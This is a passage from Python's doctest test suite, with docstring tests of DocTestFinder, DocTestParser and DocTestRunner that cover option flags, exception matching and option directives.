... '__test__': {
... 'd': '>>> print(6)\n6\n>>> print(7)\n7\n',
... 'c': triple}})
>>> finder = doctest.DocTestFinder()
>>> # Use module=test.test_doctest, to prevent doctest from
>>> # ignoring the objects since they weren't defined in m.
>>> import test.test_doctest
>>> tests = finder.find(m, module=test.test_doctest)
>>> for t in tests:
... print('%2s %s' % (len(t.examples), t.name))
1 some_module
3 some_module.SampleClass
3 some_module.SampleClass.NestedClass
1 some_module.SampleClass.NestedClass.__init__
1 some_module.SampleClass.__init__
2 some_module.SampleClass.a_classmethod
1 some_module.SampleClass.a_property
1 some_module.SampleClass.a_staticmethod
1 some_module.SampleClass.double
1 some_module.SampleClass.get
1 some_module.__test__.c
2 some_module.__test__.d
1 some_module.sample_func
Duplicate Removal
~~~~~~~~~~~~~~~~~
If a single object is listed twice (under different names), then tests
will only be generated for it once:
>>> from test import doctest_aliases
>>> assert doctest_aliases.TwoNames.f
>>> assert doctest_aliases.TwoNames.g
>>> tests = excl_empty_finder.find(doctest_aliases)
>>> print(len(tests))
2
>>> print(tests[0].name)
test.doctest_aliases.TwoNames
TwoNames.f and TwoNames.g are bound to the same object.
We can't guess which will be found in doctest's traversal of
TwoNames.__dict__ first, so we have to allow for either.
>>> tests[1].name.split('.')[-1] in ['f', 'g']
True
Empty Tests
~~~~~~~~~~~
By default, an object with no doctests doesn't create any tests:
>>> tests = doctest.DocTestFinder().find(SampleClass)
>>> for t in tests:
... print('%2s %s' % (len(t.examples), t.name))
3 SampleClass
3 SampleClass.NestedClass
1 SampleClass.NestedClass.__init__
1 SampleClass.__init__
2 SampleClass.a_classmethod
1 SampleClass.a_property
1 SampleClass.a_staticmethod
1 SampleClass.double
1 SampleClass.get
By default, that excluded objects with no doctests. exclude_empty=False
tells it to include (empty) tests for objects with no doctests. This feature
is really to support backward compatibility in what doctest.master.summarize()
displays.
>>> tests = doctest.DocTestFinder(exclude_empty=False).find(SampleClass)
>>> for t in tests:
... print('%2s %s' % (len(t.examples), t.name))
3 SampleClass
3 SampleClass.NestedClass
1 SampleClass.NestedClass.__init__
0 SampleClass.NestedClass.get
0 SampleClass.NestedClass.square
1 SampleClass.__init__
2 SampleClass.a_classmethod
1 SampleClass.a_property
1 SampleClass.a_staticmethod
1 SampleClass.double
1 SampleClass.get
Turning off Recursion
~~~~~~~~~~~~~~~~~~~~~
DocTestFinder can be told not to look for tests in contained objects
using the `recurse` flag:
>>> tests = doctest.DocTestFinder(recurse=False).find(SampleClass)
>>> for t in tests:
... print('%2s %s' % (len(t.examples), t.name))
3 SampleClass
Line numbers
~~~~~~~~~~~~
DocTestFinder finds the line number of each example:
>>> def f(x):
... '''
... >>> x = 12
...
... some text
...
... >>> # examples are not created for comments & bare prompts.
... >>>
... ...
...
... >>> for x in range(10):
... ... print(x, end=' ')
... 0 1 2 3 4 5 6 7 8 9
... >>> x//2
... 6
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> [e.lineno for e in test.examples]
[1, 9, 12]
"""
if int.__doc__: # simple check for --without-doc-strings, skip if lacking
def non_Python_modules(): r"""
Finding Doctests in Modules Not Written in Python
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
DocTestFinder can also find doctests in most modules not written in Python.
We'll use builtins as an example, since it almost certainly isn't written in
plain ol' Python and is guaranteed to be available.
>>> import builtins
>>> tests = doctest.DocTestFinder().find(builtins)
>>> 790 < len(tests) < 800 # approximate number of objects with docstrings
True
>>> real_tests = [t for t in tests if len(t.examples) > 0]
>>> len(real_tests) # objects that actually have doctests
8
>>> for t in real_tests:
... print('{} {}'.format(len(t.examples), t.name))
...
1 builtins.bin
3 builtins.float.as_integer_ratio
2 builtins.float.fromhex
2 builtins.float.hex
1 builtins.hex
1 builtins.int
2 builtins.int.bit_length
1 builtins.oct
Note here that 'bin', 'oct', and 'hex' are functions; 'float.as_integer_ratio',
'float.hex', and 'int.bit_length' are methods; 'float.fromhex' is a classmethod,
and 'int' is a type.
"""
def test_DocTestParser(): r"""
Unit tests for the `DocTestParser` class.
DocTestParser is used to parse docstrings containing doctest examples.
The `parse` method divides a docstring into examples and intervening
text:
>>> s = '''
... >>> x, y = 2, 3 # no output expected
... >>> if 1:
... ... print(x)
... ... print(y)
... 2
... 3
...
... Some text.
... >>> x+y
... 5
... '''
>>> parser = doctest.DocTestParser()
>>> for piece in parser.parse(s):
... if isinstance(piece, doctest.Example):
... print('Example:', (piece.source, piece.want, piece.lineno))
... else:
... print(' Text:', repr(piece))
Text: '\n'
Example: ('x, y = 2, 3 # no output expected\n', '', 1)
Text: ''
Example: ('if 1:\n print(x)\n print(y)\n', '2\n3\n', 2)
Text: '\nSome text.\n'
Example: ('x+y\n', '5\n', 9)
Text: ''
The `get_examples` method returns just the examples:
>>> for piece in parser.get_examples(s):
... print((piece.source, piece.want, piece.lineno))
('x, y = 2, 3 # no output expected\n', '', 1)
('if 1:\n print(x)\n print(y)\n', '2\n3\n', 2)
('x+y\n', '5\n', 9)
The `get_doctest` method creates a Test from the examples, along with the
given arguments:
>>> test = parser.get_doctest(s, {}, 'name', 'filename', lineno=5)
>>> (test.name, test.filename, test.lineno)
('name', 'filename', 5)
>>> for piece in test.examples:
... print((piece.source, piece.want, piece.lineno))
('x, y = 2, 3 # no output expected\n', '', 1)
('if 1:\n print(x)\n print(y)\n', '2\n3\n', 2)
('x+y\n', '5\n', 9)
"""
class test_DocTestRunner:
def basics(): r"""
Unit tests for the `DocTestRunner` class.
DocTestRunner is used to run DocTest test cases, and to accumulate
statistics. Here's a simple DocTest case we can use:
>>> def f(x):
... '''
... >>> x = 12
... >>> print(x)
... 12
... >>> x//2
... 6
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
The main DocTestRunner interface is the `run` method, which runs a
given DocTest case in a given namespace (globs). It returns a tuple
`(f,t)`, where `f` is the number of failed tests and `t` is the number
of tried tests.
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=3)
If any example produces incorrect output, then the test runner reports
the failure and proceeds to the next example:
>>> def f(x):
... '''
... >>> x = 12
... >>> print(x)
... 14
... >>> x//2
... 6
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=True).run(test)
... # doctest: +ELLIPSIS
Trying:
x = 12
Expecting nothing
ok
Trying:
print(x)
Expecting:
14
**********************************************************************
File ..., line 4, in f
Failed example:
print(x)
Expected:
14
Got:
12
Trying:
x//2
Expecting:
6
ok
TestResults(failed=1, attempted=3)
"""
def verbose_flag(): r"""
The `verbose` flag makes the test runner generate more detailed
output:
>>> def f(x):
... '''
... >>> x = 12
... >>> print(x)
... 12
... >>> x//2
... 6
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=True).run(test)
Trying:
x = 12
Expecting nothing
ok
Trying:
print(x)
Expecting:
12
ok
Trying:
x//2
Expecting:
6
ok
TestResults(failed=0, attempted=3)
If the `verbose` flag is unspecified, then the output will be verbose
iff `-v` appears in sys.argv:
>>> # Save the real sys.argv list.
>>> old_argv = sys.argv
>>> # If -v does not appear in sys.argv, then output isn't verbose.
>>> sys.argv = ['test']
>>> doctest.DocTestRunner().run(test)
TestResults(failed=0, attempted=3)
>>> # If -v does appear in sys.argv, then output is verbose.
>>> sys.argv = ['test', '-v']
>>> doctest.DocTestRunner().run(test)
Trying:
x = 12
Expecting nothing
ok
Trying:
print(x)
Expecting:
12
ok
Trying:
x//2
Expecting:
6
ok
TestResults(failed=0, attempted=3)
>>> # Restore sys.argv
>>> sys.argv = old_argv
In the remaining examples, the test runner's verbosity will be
explicitly set, to ensure that the test behavior is consistent.
"""
def exceptions(): r"""
Tests of `DocTestRunner`'s exception handling.
An expected exception is specified with a traceback message. The
lines between the first line and the type/value may be omitted or
replaced with any other string:
>>> def f(x):
... '''
... >>> x = 12
... >>> print(x//0)
... Traceback (most recent call last):
... ZeroDivisionError: integer division or modulo by zero
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=2)
An example may not generate output before it raises an exception; if
it does, then the traceback message will not be recognized as
signaling an expected exception, so the example will be reported as an
unexpected exception:
>>> def f(x):
... '''
... >>> x = 12
... >>> print('pre-exception output', x//0)
... pre-exception output
... Traceback (most recent call last):
... ZeroDivisionError: integer division or modulo by zero
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 4, in f
Failed example:
print('pre-exception output', x//0)
Exception raised:
...
ZeroDivisionError: integer division or modulo by zero
TestResults(failed=1, attempted=2)
Exception messages may contain newlines:
>>> def f(x):
... r'''
... >>> raise ValueError('multi\nline\nmessage')
... Traceback (most recent call last):
... ValueError: multi
... line
... message
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=1)
If an exception is expected, but an exception with the wrong type or
message is raised, then it is reported as a failure:
>>> def f(x):
... r'''
... >>> raise ValueError('message')
... Traceback (most recent call last):
... ValueError: wrong message
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 3, in f
Failed example:
raise ValueError('message')
Expected:
Traceback (most recent call last):
ValueError: wrong message
Got:
Traceback (most recent call last):
...
ValueError: message
TestResults(failed=1, attempted=1)
However, IGNORE_EXCEPTION_DETAIL can be used to allow a mismatch in the
detail:
>>> def f(x):
... r'''
... >>> raise ValueError('message') #doctest: +IGNORE_EXCEPTION_DETAIL
... Traceback (most recent call last):
... ValueError: wrong message
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=1)
IGNORE_EXCEPTION_DETAIL also ignores difference in exception formatting
between Python versions. For example, in Python 2.x, the module path of
the exception is not in the output, but this will fail under Python 3:
>>> def f(x):
... r'''
... >>> from http.client import HTTPException
... >>> raise HTTPException('message')
... Traceback (most recent call last):
... HTTPException: message
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 4, in f
Failed example:
raise HTTPException('message')
Expected:
Traceback (most recent call last):
HTTPException: message
Got:
Traceback (most recent call last):
...
http.client.HTTPException: message
TestResults(failed=1, attempted=2)
But in Python 3 the module path is included, and therefore a test must look
like the following test to succeed in Python 3. But that test will fail under
Python 2.
>>> def f(x):
... r'''
... >>> from http.client import HTTPException
... >>> raise HTTPException('message')
... Traceback (most recent call last):
... http.client.HTTPException: message
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=2)
However, with IGNORE_EXCEPTION_DETAIL, the module name of the exception
(or its unexpected absence) will be ignored:
>>> def f(x):
... r'''
... >>> from http.client import HTTPException
... >>> raise HTTPException('message') #doctest: +IGNORE_EXCEPTION_DETAIL
... Traceback (most recent call last):
... HTTPException: message
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=2)
The module path will be completely ignored, so two different module paths will
still pass if IGNORE_EXCEPTION_DETAIL is given. This is intentional, so it can
be used when exceptions have changed module.
>>> def f(x):
... r'''
... >>> from http.client import HTTPException
... >>> raise HTTPException('message') #doctest: +IGNORE_EXCEPTION_DETAIL
... Traceback (most recent call last):
... foo.bar.HTTPException: message
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=2)
But IGNORE_EXCEPTION_DETAIL does not allow a mismatch in the exception type:
>>> def f(x):
... r'''
... >>> raise ValueError('message') #doctest: +IGNORE_EXCEPTION_DETAIL
... Traceback (most recent call last):
... TypeError: wrong type
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 3, in f
Failed example:
raise ValueError('message') #doctest: +IGNORE_EXCEPTION_DETAIL
Expected:
Traceback (most recent call last):
TypeError: wrong type
Got:
Traceback (most recent call last):
...
ValueError: message
TestResults(failed=1, attempted=1)
If the exception does not have a message, you can still use
IGNORE_EXCEPTION_DETAIL to normalize the modules between Python 2 and 3:
>>> def f(x):
... r'''
... >>> from http.client import HTTPException
... >>> raise HTTPException() #doctest: +IGNORE_EXCEPTION_DETAIL
... Traceback (most recent call last):
... foo.bar.HTTPException
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=2)
Note that a trailing colon doesn't matter either:
>>> def f(x):
... r'''
... >>> from http.client import HTTPException
... >>> raise HTTPException() #doctest: +IGNORE_EXCEPTION_DETAIL
... Traceback (most recent call last):
... foo.bar.HTTPException:
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=2)
If an exception is raised but not expected, then it is reported as an
unexpected exception:
>>> def f(x):
... r'''
... >>> 1//0
... 0
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 3, in f
Failed example:
1//0
Exception raised:
Traceback (most recent call last):
...
ZeroDivisionError: integer division or modulo by zero
TestResults(failed=1, attempted=1)
"""
def displayhook(): r"""
Test that changing sys.displayhook doesn't matter for doctest.
>>> import sys
>>> orig_displayhook = sys.displayhook
>>> def my_displayhook(x):
... print('hi!')
>>> sys.displayhook = my_displayhook
>>> def f():
... '''
... >>> 3
... 3
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> r = doctest.DocTestRunner(verbose=False).run(test)
>>> post_displayhook = sys.displayhook
We need to restore sys.displayhook now, so that we'll be able to test
results.
>>> sys.displayhook = orig_displayhook
Ok, now we can check that everything is ok.
>>> r
TestResults(failed=0, attempted=1)
>>> post_displayhook is my_displayhook
True
"""
def optionflags(): r"""
Tests of `DocTestRunner`'s option flag handling.
Several option flags can be used to customize the behavior of the test
runner. These are defined as module constants in doctest, and passed
to the DocTestRunner constructor (multiple constants should be ORed
together).
The DONT_ACCEPT_TRUE_FOR_1 flag disables matches between True/False
and 1/0:
>>> def f(x):
... '>>> True\n1\n'
>>> # Without the flag:
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=1)
>>> # With the flag:
>>> test = doctest.DocTestFinder().find(f)[0]
>>> flags = doctest.DONT_ACCEPT_TRUE_FOR_1
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 2, in f
Failed example:
True
Expected:
1
Got:
True
TestResults(failed=1, attempted=1)
The DONT_ACCEPT_BLANKLINE flag disables the match between blank lines
and the '<BLANKLINE>' marker:
>>> def f(x):
... '>>> print("a\\n\\nb")\na\n<BLANKLINE>\nb\n'
>>> # Without the flag:
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=1)
>>> # With the flag:
>>> test = doctest.DocTestFinder().find(f)[0]
>>> flags = doctest.DONT_ACCEPT_BLANKLINE
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 2, in f
Failed example:
print("a\n\nb")
Expected:
a
<BLANKLINE>
b
Got:
a
<BLANKLINE>
b
TestResults(failed=1, attempted=1)
The NORMALIZE_WHITESPACE flag causes all sequences of whitespace to be
treated as equal:
>>> def f(x):
... '>>> print(1, 2, 3)\n 1 2\n 3'
>>> # Without the flag:
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 2, in f
Failed example:
print(1, 2, 3)
Expected:
1 2
3
Got:
1 2 3
TestResults(failed=1, attempted=1)
>>> # With the flag:
>>> test = doctest.DocTestFinder().find(f)[0]
>>> flags = doctest.NORMALIZE_WHITESPACE
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
TestResults(failed=0, attempted=1)
An example from the docs:
>>> print(list(range(20))) #doctest: +NORMALIZE_WHITESPACE
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19]
The ELLIPSIS flag causes ellipsis marker ("...") in the expected
output to match any substring in the actual output:
>>> def f(x):
... '>>> print(list(range(15)))\n[0, 1, 2, ..., 14]\n'
>>> # Without the flag:
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 2, in f
Failed example:
print(list(range(15)))
Expected:
[0, 1, 2, ..., 14]
Got:
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]
TestResults(failed=1, attempted=1)
>>> # With the flag:
>>> test = doctest.DocTestFinder().find(f)[0]
>>> flags = doctest.ELLIPSIS
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
TestResults(failed=0, attempted=1)
... also matches nothing:
>>> if 1:
... for i in range(100):
... print(i**2, end=' ') #doctest: +ELLIPSIS
... print('!')
0 1...4...9 16 ... 36 49 64 ... 9801 !
... can be surprising; e.g., this test passes:
>>> if 1: #doctest: +ELLIPSIS
... for i in range(20):
... print(i, end=' ')
... print(20)
0 1 2 ...1...2...0
Examples from the docs:
>>> print(list(range(20))) # doctest:+ELLIPSIS
[0, 1, ..., 18, 19]
>>> print(list(range(20))) # doctest: +ELLIPSIS
... # doctest: +NORMALIZE_WHITESPACE
[0, 1, ..., 18, 19]
The SKIP flag causes an example to be skipped entirely. I.e., the
example is not run. It can be useful in contexts where doctest
examples serve as both documentation and test cases, and an example
should be included for documentation purposes, but should not be
checked (e.g., because its output is random, or depends on resources
which would be unavailable.) The SKIP flag can also be used for
'commenting out' broken examples.
>>> import unavailable_resource # doctest: +SKIP
>>> unavailable_resource.do_something() # doctest: +SKIP
>>> unavailable_resource.blow_up() # doctest: +SKIP
Traceback (most recent call last):
...
UncheckedBlowUpError: Nobody checks me.
>>> import random
>>> print(random.random()) # doctest: +SKIP
0.721216923889
The REPORT_UDIFF flag causes failures that involve multi-line expected
and actual outputs to be displayed using a unified diff:
>>> def f(x):
... r'''
... >>> print('\n'.join('abcdefg'))
... a
... B
... c
... d
... f
... g
... h
... '''
>>> # Without the flag:
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 3, in f
Failed example:
print('\n'.join('abcdefg'))
Expected:
a
B
c
d
f
g
h
Got:
a
b
c
d
e
f
g
TestResults(failed=1, attempted=1)
>>> # With the flag:
>>> test = doctest.DocTestFinder().find(f)[0]
>>> flags = doctest.REPORT_UDIFF
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 3, in f
Failed example:
print('\n'.join('abcdefg'))
Differences (unified diff with -expected +actual):
@@ -1,7 +1,7 @@
a
-B
+b
c
d
+e
f
g
-h
TestResults(failed=1, attempted=1)
The REPORT_CDIFF flag causes failures that involve multi-line expected
and actual outputs to be displayed using a context diff:
>>> # Reuse f() from the REPORT_UDIFF example, above.
>>> test = doctest.DocTestFinder().find(f)[0]
>>> flags = doctest.REPORT_CDIFF
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 3, in f
Failed example:
print('\n'.join('abcdefg'))
Differences (context diff with expected followed by actual):
***************
*** 1,7 ****
a
! B
c
d
f
g
- h
--- 1,7 ----
a
! b
c
d
+ e
f
g
TestResults(failed=1, attempted=1)
The REPORT_NDIFF flag causes failures to use the difflib.Differ algorithm
used by the popular ndiff.py utility. This does intraline difference
marking, as well as interline differences.
>>> def f(x):
... r'''
... >>> print("a b c d e f g h i j k l m")
... a b c d e f g h i j k 1 m
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> flags = doctest.REPORT_NDIFF
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 3, in f
Failed example:
print("a b c d e f g h i j k l m")
Differences (ndiff with -expected +actual):
- a b c d e f g h i j k 1 m
? ^
+ a b c d e f g h i j k l m
? + ++ ^
TestResults(failed=1, attempted=1)
The REPORT_ONLY_FIRST_FAILURE suppresses result output after the first
failing example:
>>> def f(x):
... r'''
... >>> print(1) # first success
... 1
... >>> print(2) # first failure
... 200
... >>> print(3) # second failure
... 300
... >>> print(4) # second success
... 4
... >>> print(5) # third failure
... 500
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> flags = doctest.REPORT_ONLY_FIRST_FAILURE
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 5, in f
Failed example:
print(2) # first failure
Expected:
200
Got:
2
TestResults(failed=3, attempted=5)
However, output from `report_start` is not suppressed:
>>> doctest.DocTestRunner(verbose=True, optionflags=flags).run(test)
... # doctest: +ELLIPSIS
Trying:
print(1) # first success
Expecting:
1
ok
Trying:
print(2) # first failure
Expecting:
200
**********************************************************************
File ..., line 5, in f
Failed example:
print(2) # first failure
Expected:
200
Got:
2
TestResults(failed=3, attempted=5)
The FAIL_FAST flag causes the runner to exit after the first failing example,
so subsequent examples are not even attempted:
>>> flags = doctest.FAIL_FAST
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 5, in f
Failed example:
print(2) # first failure
Expected:
200
Got:
2
TestResults(failed=1, attempted=2)
Specifying both FAIL_FAST and REPORT_ONLY_FIRST_FAILURE is equivalent to
FAIL_FAST only:
>>> flags = doctest.FAIL_FAST | doctest.REPORT_ONLY_FIRST_FAILURE
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 5, in f
Failed example:
print(2) # first failure
Expected:
200
Got:
2
TestResults(failed=1, attempted=2)
For the purposes of both REPORT_ONLY_FIRST_FAILURE and FAIL_FAST, unexpected
exceptions count as failures:
>>> def f(x):
... r'''
... >>> print(1) # first success
... 1
... >>> raise ValueError(2) # first failure
... 200
... >>> print(3) # second failure
... 300
... >>> print(4) # second success
... 4
... >>> print(5) # third failure
... 500
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> flags = doctest.REPORT_ONLY_FIRST_FAILURE
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 5, in f
Failed example:
raise ValueError(2) # first failure
Exception raised:
...
ValueError: 2
TestResults(failed=3, attempted=5)
>>> flags = doctest.FAIL_FAST
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 5, in f
Failed example:
raise ValueError(2) # first failure
Exception raised:
...
ValueError: 2
TestResults(failed=1, attempted=2)
New option flags can also be registered, via register_optionflag(). Here
we reach into doctest's internals a bit.
>>> unlikely = "UNLIKELY_OPTION_NAME"
>>> unlikely in doctest.OPTIONFLAGS_BY_NAME
False
>>> new_flag_value = doctest.register_optionflag(unlikely)
>>> unlikely in doctest.OPTIONFLAGS_BY_NAME
True
Before 2.4.4/2.5, registering a name more than once erroneously created
more than one flag value. Here we verify that's fixed:
>>> redundant_flag_value = doctest.register_optionflag(unlikely)
>>> redundant_flag_value == new_flag_value
True
Clean up.
>>> del doctest.OPTIONFLAGS_BY_NAME[unlikely]
"""
def option_directives(): r"""
Tests of `DocTestRunner`'s option directive mechanism.
Option directives can be used to turn option flags on or off for a
single example. To turn an option on for an example, follow that
example with a comment of the form ``# doctest: +OPTION``:
>>> def f(x): r'''
... >>> print(list(range(10))) # should fail: no ellipsis
... [0, 1, ..., 9]
...
... >>> print(list(range(10))) # doctest: +ELLIPSIS
... [0, 1, ..., 9]
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 2, in f
Failed example:
print(list(range(10))) # should fail: no ellipsis
Expected:
[0, 1, ..., 9]
Got:
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
TestResults(failed=1, attempted=2)
To turn an option off for an example, follow that example with a
comment of the form ``# doctest: -OPTION``:
>>> def f(x): r'''
... >>> print(list(range(10)))
... [0, 1, ..., 9]
...
... >>> # should fail: no ellipsis
... >>> print(list(range(10))) # doctest: -ELLIPSIS
... [0, 1, ..., 9]
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False,
... optionflags=doctest.ELLIPSIS).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 6, in f
Failed example:
print(list(range(10))) # doctest: -ELLIPSIS
Expected:
[0, 1, ..., 9]
Got:
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
TestResults(failed=1, attempted=2)
Option directives affect only the example that they appear with; they
do not change the options for surrounding examples:
>>> def f(x): r'''
... >>> print(list(range(10))) # Should fail: no ellipsis
... [0, 1, ..., 9]
...
... >>> print(list(range(10))) # doctest: +ELLIPSIS
... [0, 1, ..., 9]
...
... >>> print(list(range(10))) # Should fail: no ellipsis
... [0, 1, ..., 9]
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 2, in f
Failed example:
print(list(range(10))) # Should fail: no ellipsis
Expected:
[0, 1, ..., 9]
Got:
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
**********************************************************************
File ..., line 8, in f
Failed example:
print(list(range(10))) # Should fail: no ellipsis
Expected:
[0, 1, ..., 9]
Got:
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
TestResults(failed=2, attempted=3)
Multiple options may be modified by a single option directive. They
may be separated by whitespace, commas, or both:
>>> def f(x): r'''
... >>> print(list(range(10))) # Should fail
... [0, 1, ..., 9]
... >>> print(list(range(10))) # Should succeed
... ... # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE
... [0, 1, ..., 9]
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 2, in f
Failed example:
print(list(range(10))) # Should fail
Expected:
[0, 1, ..., 9]
Got:
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
TestResults(failed=1, attempted=2)
>>> def f(x): r'''
... >>> print(list(range(10))) # Should fail
... [0, 1, ..., 9]
... >>> print(list(range(10))) # Should succeed
... ... # doctest: +ELLIPSIS,+NORMALIZE_WHITESPACE
... [0, 1, ..., 9]
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 2, in f
Failed example:
print(list(range(10))) # Should fail
Expected:
[0, 1, ..., 9]
Got:
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
TestResults(failed=1, attempted=2)
>>> def f(x): r'''
... >>> print(list(range(10))) # Should fail
... [0, 1, ..., 9]
... >>> print(list(range(10))) # Should succeed
... ... # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... [0, 1, ..., 9]
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 2, in f
Failed example:
print(list(range(10))) # Should fail
Expected:
[0, 1, ..., 9]
Got:
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
TestResults(failed=1, attempted=2)
The option directive may be put on the line following the source, as
long as a continuation prompt is used:
>>> def f(x): r'''
... >>> print(list(range(10)))
... ... # doctest: +ELLIPSIS
... [0, 1, ..., 9]
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=1)
For examples with multi-line source, the option directive may appear
at the end of any line:
>>> def f(x): r'''
... >>> for x in range(10): # doctest: +ELLIPSIS
... ... print(' ', x, end='', sep='')
... 0 1 2 ... 9
...
... >>> for x in range(10):
... ... print(' ', x, end='', sep='') # doctest: +ELLIPSIS
... 0 1 2 ... 9
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=2)
If more than one line of an example with multi-line source has an
option directive, then they are combined:
>>> def f(x): r'''
... Should fail (option directive not on the last line):
... >>> for x in range(10): # doctest: +ELLIPSIS
... ... print(x, end=' ') # doctest: +NORMALIZE_WHITESPACE
... 0 1 2...9
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=1)
It is an error to have a comment of the form ``# doctest:`` that is
*not* followed by words of the form ``+OPTION`` or ``-OPTION``, where
``OPTION`` is an option that has been registered with
`register_option`:
>>> # Error: Option not registered
>>> s = '>>> print(12) #doctest: +BADOPTION'
>>> test = doctest.DocTestParser().get_doctest(s, {}, 's', 's.py', 0)
Traceback (most recent call last):
